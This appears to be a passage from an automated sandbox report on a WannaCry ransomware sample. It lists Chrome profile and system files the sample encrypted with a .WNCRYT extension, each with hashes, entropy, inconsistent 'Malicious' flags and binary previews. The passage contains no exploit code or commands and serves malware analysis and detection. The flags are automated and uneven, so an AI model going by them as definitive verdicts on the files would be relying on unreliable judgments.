Preview:	WANACRY!......'+.....E.^.....].vL.E.BI.,@..o....t..~.......8..X(..K..,IZ......T......3......{.P.k.D....=.j...a=.....-[...Bw...OX.0.M....aj..&...)H.H@R.L8...Y.WK&....}:r<....L-S..<........._T..Ot(..k.......&{....'.l#..g.f.n...."=O.......!"#6_.......K....BO................V...O.....w..~_.....'.l..9...y.n......)...v.Yv;.U...'.%..@..?v.2...k$.....$...\+:T......]^.FA{~beJ.i..jN{W;O....8YF4&...p~.P.z..k.......y...qW........{.=P..6j.....s..b....p.<K....U...#[.&..8N....kti....:.Q...c..7...O.F.$G...5...N..^.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.451120857962525
Encrypted:	false
SSDEEP:	12:bkE0nD1PXC4ShI6nl69nTxd2LONPyfqUf303RB:bkNdCbRnQxNPmEv
MD5:	DA33B520107F2D6EF10A0735D5F6B6AC
SHA1:	F37963DA786B5684B83BA9DE3CEC4543174827CA
SHA-256:	8CB764CF89C8C0F23635CBE1270C6A4B16BFDD8D1321983A25E1F8879242DEE1
SHA-512:	499745A5DA965246D5FA6DE804725D188DDE50C5475940F36086A6098DC2398F38EB9D3D0B793795C57B6A2A0FA53466BBA87824B8A5C743F7F1E9C5C9B92EC7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....}...5..u.O..1........WM...!.".._..._......g2.k........`8.e.W.R...4E.Q..:.f......>S..E._<..c..:.ga......n..xD..u#.n3.z#>.._G.....C4...s..]..D..(....S......N...v..k..N,...l$...9At..1...2.d. .='8.;.B...B\|y[...Nb..........V.&....7......#...................].h.xP.h.....a`...].%,....6n0..Y......;.R[..[}h.E...Q.\|.M..3.+......U.Q.+..k....}..$........Di.<0.uR...Yl!34...b&..*..%&... .......F..ME...6.Mp..0...ZA.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	7.545266523283255
Encrypted:	false
SSDEEP:	12:bkEnoM1lpErXHuFCz9J0eNSfbpgrw7fEArZmpthO9VZObp:bk0HCXukz9J0eN+dew7lrZmpTEVZ4p
MD5:	F8AABA254819D9FE882282859689AD59
SHA1:	5CCD115773340FE6635B5907B4B6AEF16684D79F
SHA-256:	36FB1A823142928CCF40F31D9094A8AC5019D03306894DD5FDF4D1CFDC789A0B
SHA-512:	143E3449413785402D70F8FCB50E2B3A3FC3F137C80680799F5B821E1F7B7C45FB79DA108E21A62DFD151D5EA338A91FB116B0F729368F2922D9813D38859CAF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....\......<.q...%.7...?){...( ..[tJMtb...e....Tw...Bh\|.Y.f.:.v.N...K..a.6...F....^M........l..B..{...}..S..............+(.'C..._."...Kb.E.3ORs{.P..gVB.BA...........X.n>.[....X..(Q.].F...T.=n'5.`.,m...:.....!.cp_$.#....\|.R...FVd`.....l%K.....Ci..i.4RvP............._.v..;cI.......1........m..up......m?/l...j..RJ..z.O....<=C#....U...h.....3.....7Y4v.-..B..L..}.`.>.o;Y.&.;..j6.....Z.X........I.......HGC......$......[..1@Gdw&t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.480036079692029
Encrypted:	false
SSDEEP:	12:bkEePvjNnohb8cMvE+pn/UMzSRqw7LQ6kMZtlRj4JbDLrRlw:bkVjN28tvE+pn/fzSRq3MZtlRUJbHXw
MD5:	8D151B93F811D875C542FC53C22BBEC1
SHA1:	AFAA4A7C6000F6922AAAE947A7814A2FCA25F869
SHA-256:	22625034F83478AB4DA5E9CECE50EAE95119C1ABF56060A65ED7C9F6A013F877
SHA-512:	EE0B20FF6953EB5D3675F1DB429556C3B560AA0E39FEA5895D8F02BB66F5BC925BAFE6BCC55A98A88E8D1FC6213A56DF38EC75F8553F6180B551B9D8E33315BB
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......G.R.]..z......Bt.d?.{..#.q.0..37!..o..".....Ebr./..wB......e ..Y..>.....61.v.o.K`~.0..Z. ..'.]kG..J.).&.6..N.i1".K.....!PT.b.....SP....5....W.b.N..........=.....;..8..AV.q..p)u{..^.y>+ ..#~...........cb.?v.V.a`SGM.90...Ra^.d.y.=..1-..Pg...............@<V../.nF1.....Y...}..+........l.P......0.^.!\|M..._]`I#.ZG..ni...~,...7#t.8...I.T..0..b./...(...qO....y^V...=...r...d.H.H.(#..W.,...r.s}.R......*..j

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2296
Entropy (8bit):	7.906622859525512
Encrypted:	false
SSDEEP:	48:bkVW8jqCAMI9aKnMh6pDvou9uyWE/mSqw1gtpD0E:oVW8eMF+M4Su/mSqTt0E
MD5:	89C7F9FD08CD62EB2275AACCD225BA7B
SHA1:	0A9FA33D213DB960DE03FA42B41401AC6DB646F0
SHA-256:	8A7F6C973602DF95120865D5662C94AD35C1AEEB5796CF6EAD72D0E5AB301CDC
SHA-512:	7AB11A9F404BB5AE09295F8C38B952D9019A653750CAE6EB775C9051AED831EAA5954503C9885AA8C8291D9AE1653046C1B28BF9F142448AD349A09C7FD52F33
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....J.......#}vF.g./.+..e..}.......!.2.r...!.L..#..9H....w.....(.0..R..I...~.....\.lT.`....ns..K.<...ZT.7...-..%.\)r...}.&........i........//.......b.c....@=.a.l2.Ukh...\|.]h=R&o......d9-.J...j.o.va>...S...tu._.-W9zX7..R<..h.%...mv..a.%........z....:...............DZ.3..l.....SM.!.h.+..I....A.....V...._.....5.z.d....._o;..._Q ...\.e.i.Q..+-..?...,....~.er....#b.W{.w.30. .J.l..3.,.7.n.....:..u.,......\.q?......L..]......h...!.q..(...D..Q.ZPLF...kU..zk.....R[.k...1f..H]c#...9..yJ...S....bf....v..V.".;v \|c...q/.KP.}^\:v8$\w].......^..L.q5....T.KK.0......G...:..L.i\...I.>..&. ....m6.c.'kM...b2..k.......W.3./....\|.h..(..uOF.E.t.,..:D\N..\A..f.. .u.8C&/+.5..Z.......3.V..a..).:.;".....+O..{..n^t..'......^j....EZ.M.o...8.$...Y2...i..9.v..?.B.k./.s.]=]..H..,.'....R}j.%..Y...\s..#."sz=.}"J.D.;..V..5.B.<.....]v.'.......t....sW(...G.v[......f..?.)..uC..%.g.?..;{..I.T....s~......)0...W...Q.......L..dn,[.5[...G.....~......mLo.X\.T.T..^.x9.bR.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7d1231262330823bd07f6259b80025388c6b86e3\index.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	376
Entropy (8bit):	7.342832567525088
Encrypted:	false
SSDEEP:	6:bkEphaCc7re2cXt+NHnlauW0iNT+Oyl2wovQd7PNDOEa1fU94C/SA54CNHLYTkr:bkEphHui2FNqT+OylpoodrfV94S2CLnr
MD5:	C4FBCB498AE582DBDB49638ED8F1DB2C
SHA1:	DFB82432A7209D5C59DCF2CBC028EE7319FFB85C
SHA-256:	DAB4550D1880BEF20F220FC50C3CEC4C7313F5E545E62A3AF2638184D67C157B
SHA-512:	1DC20809E7A681031CE4BE7E962C8F8208D31AF40384986B266B8A04AA0905D665A6729C01A0F53F4BA3FCF4258257300F77B731D586AB29928FC6A2A0614A6B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....p....w.&. xU.T.E...lx]..h:%)..:..l............?..5.....!P.3&7.n^.._.u.....t1.X.`5.H.0FU.y...7...HqC)~....m..9G..2#0..bc...7...R.?HC...K.OP6.<........^B.~}].KV+My<,..5s...,).......[......s..I.4..V....7...1v.9.0.0<9o.H}.[O.z.C.wR8h..;U....P@...[.f....Z.......~[K..F.....&,6.......py@.....'Lm.NZ'.O..e.5!...~1....CK4PK.C.-...p.G.[L..J...-......j...^....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	28952
Entropy (8bit):	7.993991589131277
Encrypted:	true
SSDEEP:	768:yfGRYNr4O/26kXnH/5eHO261LVVSH6mUf5RHSayDYS5NsRIpT:yOyJkvUQJMH6DNIx
MD5:	7F16A3F90B7B297D1E6261D3E2F5324C
SHA1:	CC5892DA0D817B2881E98EEDF02B92E915FDEFC3
SHA-256:	E72A458B7EC0253B859C98DDA87DC00E309A975A4D25C60B7F4BC55E64737801
SHA-512:	373CE0814EE602910AC497243D560EDDD45404B376759EEFC5D5F380618C2E12A341570B018D223C226829F85B21C827E6FB275E6F3E2ECFF37B8C6FC8D737B5
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....S.n..o.v..K.'?.v....8....@.....Z./`.k.BC..f.8.CT-.Y.S7q.YM..D;p...~..].L...K.;y..Y...4\|....+2...&z..A..[i..G.....2;6`E..Y..F....%1..o}9.D..3.4.;E...[w.H,..:..<.G,.QW.?Hy..G..d#.H..].....IV........>..^w...........G.. ....[..,.B.Sq.lfN..x......p.......]..m..$..^n=...h..........&...p.)m..^&..t.nPI.5M.W.j...N.a ....2...K.].[....^.\|T..$.W.......s......[2....Q....(..W.w.....+g.i.D..k.\|....6n.>......P.cO..?,...........h.k..[M...l.l...z.Y...U.....@...i.7{W.......C5...7.r....TF~.~..(..\|_.D+.n..t...M...v.t...)..j.v.O{K..0w...t!..9....@..G..(. g..?ch.?f5@...&.k.2/...r..p....Oa!...?,.f..z..:rV1..F4...}d.Z.n..a..KKWt.7x.\....._.Y.y...v.._.(..CK..\|..@P.P....8Ol..u(."......7......L....>.<....(..\..../.9...g...b.vE?.....Q..?.U........':0.....!........]...R...8WIW...."..sRM_`.n;N+?....-.W.].<..O.eM.^#..hb819....l..%......*.H...M..l....f.v.n......=..M.7G-~.......4....mq.>....?l&~I\f.q.^......]...I.7....r.Y:DT.&.t..>...N...\..I.qfM..s....{.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16664
Entropy (8bit):	7.989366482411808
Encrypted:	false
SSDEEP:	384:agkzD6zL5YanZVmtgDtm8qqI5j5V21NgatLbJx:Bkz2dZVmKDtmZ/V21NTb
MD5:	CDA2A824FE6E505D57E2C8FEB491101A
SHA1:	5CA0E8D750419D2EACAE34B7B7397BC06441EE39
SHA-256:	127B41177382B0FD75FD99A1DFDA4B29FA82B013C546D7D74F894FB02E4B675B
SHA-512:	3029E0EE1E88509C14EFD3992FF33B9EC4F68FC2D776FE65306D0D5B6AA0ED4EBAA7B0F6AB5DA871BBCE44DD2D64DAFDCE7D436FA0856D916EEE3B6E780926AF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......Ri..@B.....K..e.JlE:%....}.8......t(x)......k.62...j..j{........g....?...!......\|.l..F...5..A.......a. ....?..d,\..G...[.`...r.............P..K.a#..o.U&x....>..,.....>j.S....^.....t.N..-.[J..E..r.....om`p...\.w.`.....@.7...FA3]m.^..N.....@......9kT...{.r.l..4.GD....b:...f.}}....AKH.+...z.%.\|+.gN\3W..m.`.....^............@.b..G.>j.....].?hd@.$..U" ..Ms......B..#....WB.:2...T>Y.R\|1..}.9.p..Q..v(.@p.. . o..F(...m.....g..<7...}...............w[.].x0.^.].O.fG#-.x[.l..(...w..l?.....+..M..r..\m.h.t..........C....e.&.c`p..m.g........ty.)$..{)...k.....9.x...gJ..5C..S......C.%X.z.(.VC.......A..:.L../....5D.y..g...P.v.QL.v....."UW:$VzS...]....7j.'....kw...b.q-..2..z.v....c.x.v$Y.....Nz..Cx..%.<I:.\....R!X.....'.z...pmdyT4!.$..A......?.mI=.f..\..m..G.f..\v..1.... e...3...H..6./-~.......#......LT.e0.>G..&...Pg..F...I.?n...Hrcu..l.,....X= <u.....*..`....@s.s=^.t.5>..{.W....2.m{.}....v.mr....+..A.x...._..Y.RI..X-..E.'....,Z.D...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24904
Entropy (8bit):	7.992308584650091
Encrypted:	true
SSDEEP:	768:twDr13erZQVpYJUaS5MhlMhuh4OJLR94zoO:twFwZQAJhSIlM0h4OJD4zoO
MD5:	6A97732821EA6AB8BEDB9DAEA259964B
SHA1:	1768C4F1A2C7070E397AE0FA3E9633BB7567FEBC
SHA-256:	F639712D0EEBECD5F8F4EBF06AE858820E46D7304483CDD04DEDE1B3B4A58535
SHA-512:	76C2B022741B9E66362DFD66E503CBCB130E673FB4396F9BA4993F081B43A1DCDCB3A08153F3C557490ECBCACDF756586FFC71321BB76248BDC4C3BD98DAFBA1
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....?.P<...f.....Q.Tc...+7.\|.d.._...............C...V.}.n.cJ:Q.d.......;......;..".... .C.E$.D...b.......Z....n...6...\.Sg...=.=8O...B.S2s....u....F<....",......<@.....k.m..).y\.Z....y..~....i...I......".......B9....yz%.HR.R,..4.%.Dl.........../`......_.4.......R.K.\|.St..6.\....J(.U..R~pBy.-......;..J...&..d;n.C...BB......hH.x..kb.G+..c..(..B5.....".@.,...e....(.?Ir....y.....'[.._/.Z...Z.T0...5(.].h.JZ...D".4..}..+<l.\|!v.dg._..0...&."...........t!..SlVK..f....}rdL.=Fn._.O...E..bC=....g.t.$A.&.EN..L...\..{.za.;2.&..d.....o]....:q.Pbt[..QF.>q....i ......C#...<@PaO.X}z.sj....f..\|FueD.."..QD......4...KY..U...)..].".A?.@#........K4..S?,.x..E.Q.m..=.O.%\...J.La...P..N0...f>...d.v....F}...5.zl.y....m3.....Z....$)...\..\G.l.*.K.g.i.2..lw3VJI...mx......]%....3...2..)%...e...@......0.+..e...)w.Ct..ma.(o..XX.f@.sX..I.."P.g.K...s..,.\..%.}.?.B..S.:.j.W..$>.......[kf.{....DB...!..... .A.`...a...:z...i.s....Rc.)...{.I.o...%.N....?w.e..7O

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	277304
Entropy (8bit):	7.999290997832996
Encrypted:	true
SSDEEP:	6144:9imgqqA2RtFTh6poJShXPiwREmpeR4T0JX/gQCi2w:AX82RxwtqgEmkRu+ow
MD5:	69A96C2C908CA44764DCC07C076E2005
SHA1:	1E7FABB2202EAC6B95630D305D5EC138623D290A
SHA-256:	4399BF94E3B5B46CE45FEC2D66C8A76591215D2969098F69AD8C55879C509219
SHA-512:	7F68B72BA82B9077243AD50E36FBD5AB6857BEE7596CC02EEC31B4FED288FDD4F3F5328EB5E95A7AF3BC3ED7E94FE2DEE42795097A22B38A2109E2C5F142C88A
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........&c...:r....6.XM;,.J..W=....T[...%...mcQ)e{......J.X.%QN...E..Eq.;..UUU....4 ...'..?3j.N.1.&.F{.{oF..FcL.w:....p:.>.y.Z.........%.?.[.H`pc..7....... ..X?@k.l.....-...:...J.C.tCu.z.h.\|........7..[@.<.J.2..w).LP\|.....7.0.&.i...y{...]../.' .].....:......s.Ni...hiR..,.o..%.9H...B..\|..T.....@.:~..'.A}..a[....`..7.`ap.;..xz.~.b.9U./.......8....@..m.....]...{[>.~.....f0...Q...T..3.E.('..8......A{5kw3..lb..2V..S+[._kO....t.....OM..j%..mH.8q..v..L.M.....&......"3..P........[.\|..m.#.0...T...I.b........ac9,,=[..k...KA.Cl+......._......x..p.d#...v.3.1`.2.H.[...)r$.:..l.\|S.G......@.P..AH.\{...%...]?...{m%...;.Z....W.:...\|(.P.[..A..P.R...[....l.O.O......;...J.J......46..6...N.q.a....=.....cq.e..`+.y..O....xk....Ay#i......M3.".u.(.B...v..v.9...@.....B .........v......v.....~.}.-9.wQ1.MN/.......Pt..E.. ..V.j.jZ...6...2.El......\..X\|i...1.yb....u.N}2...x..X.4..kN._.z..;..*.........nW~kG...v!........0...68G.F".......b..V.b....N.`.>.<I.u..

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	27000
Entropy (8bit):	7.993727844877068
Encrypted:	true
SSDEEP:	768:B64SOYTw4S9+Dq/dnfPOk4GdP9uwagcl6DteBkP:XCM44IERP8GdPM1gczB+
MD5:	88E1103295C4E1FB836C3498D677D218
SHA1:	802BD8E75CA591F4FEF0BA32E3C5E93B8DD1E310
SHA-256:	7A9E90A9ECF100A03610286FC9360D717707F0615163F544FF973685BDE86F13
SHA-512:	1935EB5BD62682D51CB2CD1B45C95FCFD90AB0C9D711B981AD4114ADA8AE3C5DFA60350951E9EAAF81B47115CF5B31650B2AA072820F4BC1F17FC2FE8DB45290
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........_m.\|.6q....7.{1.I.s.....#p..w.i...I..=>.[....T..<..x3...U..X.lc..bz..hq.\|.05.5.v....\..G.q0\.BJ..{..CSE.0......`.S.....Wx4..,..%C....M.."......?..xm(y..\|....e..B..m.L.t.D....}N.........K.....\|....;...=....i...>,.!....HG..U\....^.;^.B....Th.........M.r9..o....B........b....Gx...o......5?,,. ...K"..fK....3e.lakH...{..z.q....Jwv.78.G..0B...I.'.......v3:.;...6...H....).\Y..jA.%......Wc:Zn...O...sD..4YU..,..U...;.I..p..b.]v...d..g.e..X$.....zG..P....Pj.a."....o.Y.%...).WB..1tj....#.I..f.....z.p...[]W#.=i.>Z....q..Q.....n .U......#..{...Z6.._.c.s...,...eU..G.'.u..J.. ..i..,:?[..M......L;.7.f.........-...4c/.F.Y..0.5W.[K..`.'.../....x.KrW..b>......QB{.......Y&6..\....Y.\|k...M.k.~(}9.........j..{PK,b..-~.0.1h.....s3.O..Iu`....l..0...^.%.=.'Q..5s..P.\|4...g.cF.X@..y..D...........Ses..[..!.[2+.P..:S{..UEH.q:.5AyO.SQ....I!Cgf...L.86..`.A4'+.....NTw.....S^.=...~T.4.../KQ...A}.6\|..n.s..g...y$'..t.g..8.x..../...9.<g....%

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6952
Entropy (8bit):	7.971259553319504
Encrypted:	false
SSDEEP:	192:dBb7aV39yqBvSmFd8+8bGqJU4mqCnKp9djAWB8GJPCyp:r7aFUq93Mmq19J8GJp
MD5:	304EF087A29A0A6AF6508F4175AD2EC4
SHA1:	B4F771056476B2BB65108D710072965D8169123D
SHA-256:	776C9364D09AB7C733D45B7CC3C84BB8577D9CE39448FF9BA98B6031639460CF
SHA-512:	3AEE4A3D171A84D1877835DAFEFC3D6F992870B71AB15B1526A27635297020122952C095110DE0972AAB257D201F68A29EE11CD44A49658AD71A41DD4322B68E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....eH`E:.S.58I-.......Y..G.....y`N..I..ml^.zv.dT.......t.6...$..j...uir..M;..%.a]H.^_..y..V{...5.q....... t[.0;1P..]{.v.Mq.=.P]..e)......}S.N.r...../..)c..2.lq..&b.r^..-..$..X.G...w..)...0.J.((.\|.?...>l.C...}..3T.".B.!..#$Z<..m...f/...........d............U.tU..Q..C..T......R..A3.>."O....g...P.H.-..4.._S?n.\|^......9.mR.r.BT.O.:.Q.n..a-.......I.90E.....h.....c.?........&......T.e.R......R.l-?p.N../8..I/.^.v.t......I./.B...r41.$.y.%..s..c..{.....?..P...j.../u..I.u.{7...K...~...... ...1.`... .-H.....~i...]..l..?.M.d.7......I.......p..6-.#.jY...;VQZ..Kd.....H~.5..q9.._.$..J}...,.4%.H...Y....@...8@.,..+..9.U.K...!.r.~.>,V..H..}NC..N.dL..i&L.......7}..t...V...[.6.N....f..>.H.kE.....M..8:...U...H.9<.E.l.@....5..d..0o......._.4.....L.J....wN..i\|a'P./...=Q%..M.d.f....Kf^.`..xD.%XE....T..O.V...F.&......M......9.).3].A..].SA.@[.Z+...5...a...4zo........l......_....I...I.Xh.5"...g.f)W'.s.......T.i"`...E....._).....g...u.j...m.l.\|cx.;.

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	242232
Entropy (8bit):	7.999235052139601
Encrypted:	true
SSDEEP:	6144:DjTjA70myigUrnRfQwzxqKbpHFN4cI1FD:DPjrYgUrnRTxqKbplNFI1FD
MD5:	232108BAA604A75B60F73BC0CAA04D71
SHA1:	A39464198BAC165564C5C59BC612B1D54D873AB9
SHA-256:	7A3C96928772798F89AE30D24C3D8DCD960029815CB469DA4AE15EC09E35A417
SHA-512:	1DE4D8FE1C54B8872313B77141B0C7BBD6247FAF81E94BF4A6C91BB4EB625446E212B19201EFEE3BBDB38E2E355855BD1A5AC46C850FBB8278A71B0B02BFFD74
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......y.C>.Q.S.!dEv....[}...j./z.v...."^...a}...}.p3Q..].$W}.8...a.K.}3y..H.R).....0DT..z..8..\%V.4_..b.'..f.({............U..!....%JG/.z._...^F....P$M..q.,..+...~....\..=B....K\|.!..(...Z.a\\|...........X...o8{/.u..;-f/ o&w...9...B.s5......S.#....................t.}...38...`..T}..bdx......f..-.R.%(.*#,=.}..........m..4.Ep.d.<.......S....R...1.n..o...@......8..ue..~.dJV......c.AN...7;../y%...5h...X...!.?<.(\|0c.cs...q.KP.u.%..].;....K..n..B.....O.............(.z..y.@..6#'I....:{3..Z.l{...%{.3my....%'......]....X.g....`.9; ...A..;w?.b.}!...T.5..Tu......$!..._wT....GO....3.FX=..\....$$.&><...n..@..4..<}....f.A./~.Q7u.....M.....q...%.....b..\|2.I...G[./-.~..W.$......g..b...."..b$h.>.@..h........}.xZ.B..zI.u...6.....M+>....'q..>.....v.....G)6. .<~ Z~.......l.1...........O.u/0fz...........:....\|.j}...._.7S..e.{...gQ.u.?.- D^.nm.x`.M..[........[...%}@....... ....Xc....zT.........F.....d.+.....OV.....9.N...<~..$@+..n.y\|8):.!.........z.,..

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	76360
Entropy (8bit):	7.997692797409392
Encrypted:	true
SSDEEP:	1536:kcBJCim3qan5mR/5PZaLjoN7YeJACGt2mIHR0qP+8cDivw6YiXxmAsMId/:kl6d2MN/JAd2myP+piYI3Id/
MD5:	30E65CEF2DD54AAFA5C08768061D5C8F
SHA1:	AE8E6317D1AC0AC412CDBC4C95954E703F5B4E62
SHA-256:	DB3ED69A0166DFBCF077B04EFF7B4E681B5B3A80ACC66B3DEE0A311E95795D39
SHA-512:	27FECED04856862F0ED93847660FE138739F481F54884C2C8D42800844C586144A0D18791042DB9AA41F61C41E983FB42EA3777A51BB0212609B084F7D4F5662
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....NAa..pt.;.q.0.#..)A...a}.^..s...(.~..y_.`..k.]...T.W....{...?........l2.$\|.Ys'..A.^..=..N.....}.L..g2!Z.4..d.<.\|.F0....n.)l...w.G...F...Gn.....,nD..~......`.D[}.D.l....%..., Z.@"b.-Rs64.@..!.Je..V..".J....%.=.....1..n......"u..{$%{}..5.4........-).......N...t=Q...z.Q...My..4...Q..3Hr..S..8.../iyX/...hl..L..G(.#...U...X..?....G...1#0C`a.....Y.w..\...h.D..f.E.....[.VE.Fy..;....S.d.0.v-...Z.[@.4...-].........8mc..vIy..q..Bg....h.`.{=I...}...F0+W...?.hB....!.......bW.CF.+Tn..F..(..A...>.uW5..6{f..M.....8VL.. .....o.yd.>.p...?....h..0.J.h......Rv..x.#.......$.c=1..b^....!.ehnV....N...\&s......w.p#.#.q...(......U.....7.7.j.e.4 .!.3.....q.....H..#.?.x...%...<).MJ.R\..#+:.."4...h@N".NWn...=.6.y.W..Y.Y...~.#\L......x.W.".!.s..H..,h>.W.O.w...@../../yO.d.%..kz...O/u.fv.U7v)r.zk..0../G....B..).R.z.3.?..zH.B...-u........bKo%...e.s..Z..q...M.rR...k1..^R.1BI....DX.6N...T.:..#.^..u........H.m.....A..&....^H.&.^.5xHV$,.....<S..n.h....D.G.N

C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	164584
Entropy (8bit):	7.998874633990367
Encrypted:	true
SSDEEP:	3072:VzxYPB4+AhhHH7xEJLyFdQVzzRwsAIvC8kJAFRVdF6dJxWM3e03m:V4B2LuZyAzz+7IgJAFRVL6PwMxm
MD5:	6338ABF399C9900FC1014A7E01CADC85
SHA1:	0D79209199FE1093BC7FDC963527EE6F53C0A3BE
SHA-256:	A7CB061FB98D48BD0CFD867E91328069500A18DDEEE0AF9EF2BFB61027F45BBC
SHA-512:	E1DB9AE6AA20DE50D016509BC072950892AC4B72E7E904800C028D70669613509B93CD82E6594578F8F68175C722E4D7CBC6D15197A6CB0971E10A18352EC110
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......;..Kw......`...m.2C.>~..v..fL;.vC:..4$.\|..e.u>..yQenH.#h........K...LHq..x.....9c.K:..P..d.K.}..A...T..u....J.h.@..._...Zi.K..A.........m..?..h.n..........7.h...UPx.....Q2.X...X...W.....@K....4&{zB..w.....#....S.D.1.....,.'<w..c....R#vE..Y............o.)!..7...3..ao:9!....E......Vd=P.F...oh.rP;..=n.7.\..:;..0.$E...[..G..8.%a...P..d.%...H!..ab..E;.).....]D7...3+..l"=............1.....7.'I.;.....y......... ...S....b&..n..f8.pD..qxk.....A.s..\...o@..R.8($.}..vs.5HJ..m....:NC........N@Z.......w^..?....$\|...j2.z.h.....Q.d.".......lbV...g.r....b.h....B.......>N..Z..nX.5.k{^..f.W..yF..:.2...'.Sd.....^.mP.$.?I..}O..bK{. ...Y..H.d2..K/Z&..Is..=bE.Z......:...o.........%`2th.......O.....5.#0.hZ...&-....3.ha..f{X..u(9.Ui......#.......V.k.jC.A. z..8...0N... ...B..[;oa..4...... ..x>..;.C_..&........$...-...da...\A+@..\|.~H.B.r...........H..5..gA.K..?. .y......9C..).).k:S.6.L..+....T......G1?f..c.la..!.R]"..v.k...W,.....^.../..n.)........

C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.152946112549991
Encrypted:	false
SSDEEP:	6:bkEpQRSyfoiLIz+7toxQreqE+3THKRb+cQOpGdN5YyXn+W1IIVvEo7olhHw0PQJs:bkEqR0i7LRE+G6h3dN5YEn+ofZMLwTh6
MD5:	00BD314DA490C146754AA14A50001F5E
SHA1:	0261917CDFD93598EEF86BCD5C6986D20664ECE7
SHA-256:	1AD18A86470407FC9B32D3D7E93E6C375A1031951343E5D570D0759691B62B51
SHA-512:	AAB5A9CEAD1EF00EB47D3194BF283F28CBD0DAB0D6A6C1B68D2BB780E44A36AAFA2D370DC71B463319DECF1DB12EE752028FC1241278A2407579F30F81C59B22
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........".^..7.z+.U..\|.. R.f8........I....{h1.......+.^..+X4..t....-.g....>.q.K.....z6.....\|.y......V..Q..="oA 5S...4Sy.95.R4.f...v....}&.>..\.==.2.9.....S..6`.=.el...p..%(.VqN....F?..A...~=.,..U...Rp\.+...wG.x..e...e7~.........t.%........'%.n...............,..cb.iq...9.-

C:\Users\user\AppData\Local\IconCache.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7896
Entropy (8bit):	7.975240276415169
Encrypted:	false
SSDEEP:	192:czyLas/Yt7G01j7ewEiTFSaXYspZudwXwtBT4ef:RaQy7f3ewEiTfDZhw3/f
MD5:	2D9AA36E5CFC140C3D3213B415817A9B
SHA1:	6517C276FA7334915E2E90EB1E2C295CFC41BBC6
SHA-256:	6BFE89A621A3285EFBFCD0F7931EABFD5ACCE523D94263798C23269E8A0354C9
SHA-512:	474708E8EF07EF08E7A587CFD67BD6EE64A31112E536BB1D6E111C6EB247C3E5A89D452B20D332C9DA0D5EAA961593F5B1970A261BF2C274248D8CA9114A1ECD
Malicious:	false
Reputation:	unknown
